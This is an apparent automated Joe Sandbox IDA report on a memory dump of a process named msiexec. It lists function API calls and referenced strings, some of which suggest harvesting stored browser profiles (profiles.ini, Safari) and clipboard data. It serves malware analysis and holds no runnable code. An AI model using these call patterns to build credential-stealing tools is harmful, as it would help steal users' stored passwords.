                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: EnumNamesResource
                                                                                                      • String ID:
                                                                                                      • API String ID: 3334572018-0
                                                                                                      APIs
                                                                                                      • FreeLibrary.KERNELBASE(?), ref: 0044DEB6
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FreeLibrary
                                                                                                      • String ID:
                                                                                                      • API String ID: 3664257935-0
                                                                                                      APIs
                                                                                                      • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseFind
                                                                                                      • String ID:
                                                                                                      • API String ID: 1863332320-0
                                                                                                      APIs
                                                                                                      • GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AttributesFile
                                                                                                      • String ID:
                                                                                                      • API String ID: 3188754299-0
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 004095FC
                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                        • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                                                        • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                        • Part of subcall function 004091B8: memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                                                      • String ID:
                                                                                                      • API String ID: 3655998216-0
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 00445426
                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                        • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                        • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                                                      • String ID:
                                                                                                      • API String ID: 1828521557-0
                                                                                                      APIs
                                                                                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                        • Part of subcall function 004062A6: SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                      • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,?,00000000,0040627C), ref: 00406942
                                                                                                      Similarity
                                                                                                      • API ID: ??2@FilePointermemcpy
                                                                                                      • String ID:
                                                                                                      • API String ID: 609303285-0
                                                                                                      APIs
                                                                                                      Similarity
                                                                                                      • API ID: _wcsicmp
                                                                                                      • String ID:
                                                                                                      • API String ID: 2081463915-0
                                                                                                      APIs
                                                                                                        • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                                                                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                      • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                                                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                      Similarity
                                                                                                      • API ID: File$CloseCreateErrorHandleLastRead
                                                                                                      • String ID:
                                                                                                      • API String ID: 2136311172-0
                                                                                                      APIs
                                                                                                        • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                      Similarity
                                                                                                      • API ID: ??2@??3@
                                                                                                      • String ID:
                                                                                                      • API String ID: 1936579350-0
                                                                                                      APIs
                                                                                                      Similarity
                                                                                                      • API ID: free
                                                                                                      • String ID:
                                                                                                      • API String ID: 1294909896-0
                                                                                                      APIs
                                                                                                      Similarity
                                                                                                      • API ID: free
                                                                                                      • String ID:
                                                                                                      • API String ID: 1294909896-0
                                                                                                      APIs
                                                                                                      Similarity
                                                                                                      • API ID: free
                                                                                                      • String ID:
                                                                                                      • API String ID: 1294909896-0
                                                                                                      APIs
                                                                                                      • EmptyClipboard.USER32 ref: 004098EC
                                                                                                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                                      • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                                                      • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                                      • GetLastError.KERNEL32 ref: 0040995D
                                                                                                      • CloseHandle.KERNEL32(?), ref: 00409969
                                                                                                      • GetLastError.KERNEL32 ref: 00409974
                                                                                                      • CloseClipboard.USER32 ref: 0040997D
                                                                                                      Similarity
                                                                                                      • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                                                      • String ID:
                                                                                                      • API String ID: 3604893535-0
                                                                                                      APIs
                                                                                                      • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                      • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                      • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: Library$AddressFreeLoadMessageProc
                                                                                                      • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                      • API String ID: 2780580303-317687271
                                                                                                      APIs
                                                                                                      • GetSystemTime.KERNEL32(?), ref: 00418836
                                                                                                      • memcpy.MSVCRT(?,?,00000010), ref: 00418845
                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 00418856
                                                                                                      • memcpy.MSVCRT(?,?,00000004), ref: 00418869
                                                                                                      • GetTickCount.KERNEL32 ref: 0041887D
                                                                                                      • memcpy.MSVCRT(?,?,00000004), ref: 00418890
                                                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
                                                                                                      • memcpy.MSVCRT(?,?,00000008), ref: 004188B6
                                                                                                      Similarity
                                                                                                      • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                                                                      • String ID:
                                                                                                      • API String ID: 4218492932-0
                                                                                                      APIs
                                                                                                      • EmptyClipboard.USER32 ref: 00409882
                                                                                                      • wcslen.MSVCRT ref: 0040988F
                                                                                                      • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 004098AC
                                                                                                      • memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 004098BE
                                                                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                                                                      • CloseClipboard.USER32 ref: 004098D7
                                                                                                      Similarity
                                                                                                      • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                                                                                      • String ID:
                                                                                                      • API String ID: 1213725291-0
                                                                                                      APIs
                                                                                                      • GetLastError.KERNEL32 ref: 004182D7
                                                                                                        • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                      • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                                                                      • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                                                                      • LocalFree.KERNEL32(?), ref: 00418342
                                                                                                      • free.MSVCRT ref: 00418370
                                                                                                        • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,76F8DF80,?,0041755F,?), ref: 00417452
                                                                                                        • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                                                                      • String ID: OsError 0x%x (%u)
                                                                                                      • API String ID: 2360000266-2664311388
                                                                                                      APIs
                                                                                                        • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                        • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                        • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                      • OpenClipboard.USER32(?), ref: 00411878
                                                                                                      • GetLastError.KERNEL32 ref: 0041188D
                                                                                                        • Part of subcall function 004098E2: EmptyClipboard.USER32 ref: 004098EC
                                                                                                        • Part of subcall function 004098E2: GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                                        • Part of subcall function 004098E2: GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                                        • Part of subcall function 004098E2: GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                                                        • Part of subcall function 004098E2: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                                        • Part of subcall function 004098E2: GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                                                        • Part of subcall function 004098E2: SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                                        • Part of subcall function 004098E2: CloseHandle.KERNEL32(?), ref: 00409969
                                                                                                        • Part of subcall function 004098E2: CloseClipboard.USER32 ref: 0040997D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Clipboard$FileGlobal$CloseTemp$AllocDataDirectoryEmptyErrorHandleLastLockNameOpenPathReadSizeUnlockWindows
                                                                                                      • String ID:
                                                                                                      • API String ID: 2628231878-0
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ??2@??3@memcpymemset
                                                                                                      • String ID:
                                                                                                      • API String ID: 1865533344-0
                                                                                                      APIs
                                                                                                      • GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Version
                                                                                                      • String ID:
                                                                                                      • API String ID: 1889659487-0
                                                                                                      APIs
                                                                                                      • NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: NtdllProc_Window
                                                                                                      • String ID:
                                                                                                      • API String ID: 4255912815-0
                                                                                                      APIs
                                                                                                      • _wcsicmp.MSVCRT ref: 004022A6
                                                                                                      • _wcsicmp.MSVCRT ref: 004022D7
                                                                                                      • _wcsicmp.MSVCRT ref: 00402305
                                                                                                      • _wcsicmp.MSVCRT ref: 00402333
                                                                                                        • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                        • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                      • memset.MSVCRT ref: 0040265F
                                                                                                      • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                                                                                                        • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                        • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                      • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                                                                                                      • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _wcsicmp$Freememcpy$Library$AddressLocalProcmemsetwcslen
                                                                                                      • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                                                      • API String ID: 577499730-1134094380
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                                                                      • String ID: :stringdata$ftp://$http://$https://
                                                                                                      • API String ID: 2787044678-1921111777
                                                                                                      APIs
                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                                                                      • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                                                                      • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                                                                      • GetWindowRect.USER32(?,?), ref: 00414088
                                                                                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                                                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                                                                      • GetDC.USER32 ref: 004140E3
                                                                                                      • wcslen.MSVCRT ref: 00414123
                                                                                                      • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                                                                      • ReleaseDC.USER32(?,?), ref: 00414181
                                                                                                      • _snwprintf.MSVCRT ref: 00414244
                                                                                                      • SetWindowTextW.USER32(?,?), ref: 00414258
                                                                                                      • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                                                                      • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                                                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                                                                      • GetClientRect.USER32(?,?), ref: 004142E1
                                                                                                      • GetWindowRect.USER32(?,?), ref: 004142EB
                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                                                                      • GetClientRect.USER32(?,?), ref: 0041433B
                                                                                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                                                      • String ID: %s:$EDIT$STATIC
                                                                                                      • API String ID: 2080319088-3046471546
                                                                                                      APIs
                                                                                                      • EndDialog.USER32(?,?), ref: 00413221
                                                                                                      • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                                                                      • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                                                                      • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                                                                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                                                                      • memset.MSVCRT ref: 00413292
                                                                                                      • memset.MSVCRT ref: 004132B4
                                                                                                      • memset.MSVCRT ref: 004132CD
                                                                                                      • memset.MSVCRT ref: 004132E1
                                                                                                      • memset.MSVCRT ref: 004132FB
                                                                                                      • memset.MSVCRT ref: 00413310
                                                                                                      • GetCurrentProcess.KERNEL32 ref: 00413318
                                                                                                      • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                                                                      • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                                                                      • memset.MSVCRT ref: 004133C0
                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                                                                      • memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
                                                                                                      • wcscpy.MSVCRT ref: 0041341F
                                                                                                      • _snwprintf.MSVCRT ref: 0041348E
                                                                                                      • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                                                                      • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                                                                      • SetFocus.USER32(00000000), ref: 004134B7
                                                                                                      Strings
                                                                                                      • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                                                                      • {Unknown}, xrefs: 004132A6
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                                      • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                                      • API String ID: 4111938811-1819279800
                                                                                                      APIs
                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                                                                      • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                                                                      • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                                                                      • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                                                                      • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                                                                      • EndDialog.USER32(?,?), ref: 0040135E
                                                                                                      • DeleteObject.GDI32(?), ref: 0040136A
                                                                                                      • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                                                                      • ShowWindow.USER32(00000000), ref: 00401398
                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                                                                      • ShowWindow.USER32(00000000), ref: 004013A7
                                                                                                      • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                                                                      • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                                                                      • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                                                                      • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                                      • String ID:
                                                                                                      • API String ID: 829165378-0
                                                                                                      • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                                      • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                                                                      • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                                      • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 00404172
                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                      • wcscpy.MSVCRT ref: 004041D6
                                                                                                      • wcscpy.MSVCRT ref: 004041E7
                                                                                                      • memset.MSVCRT ref: 00404200
                                                                                                      • memset.MSVCRT ref: 00404215
                                                                                                      • _snwprintf.MSVCRT ref: 0040422F
                                                                                                      • wcscpy.MSVCRT ref: 00404242
                                                                                                      • memset.MSVCRT ref: 0040426E
                                                                                                      • memset.MSVCRT ref: 004042CD
                                                                                                      • memset.MSVCRT ref: 004042E2
                                                                                                      • _snwprintf.MSVCRT ref: 004042FE
                                                                                                      • wcscpy.MSVCRT ref: 00404311
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                                                      • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                                                      • API String ID: 2454223109-1580313836
                                                                                                      • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                                      • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                                                                      • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                                      • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                                                                      APIs
                                                                                                        • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                                                                      • SetMenu.USER32(?,00000000), ref: 00411453
                                                                                                      • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                                                                      • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                                                                      • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                                                                      • memcpy.MSVCRT(?,?,00002008,/nosaveload,00000000,00000001), ref: 004115C8
                                                                                                      • ShowWindow.USER32(?,?), ref: 004115FE
                                                                                                      • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                                                                      • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                                                                      • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                                                                      • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                                                                      • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                                                        • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                                                        • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
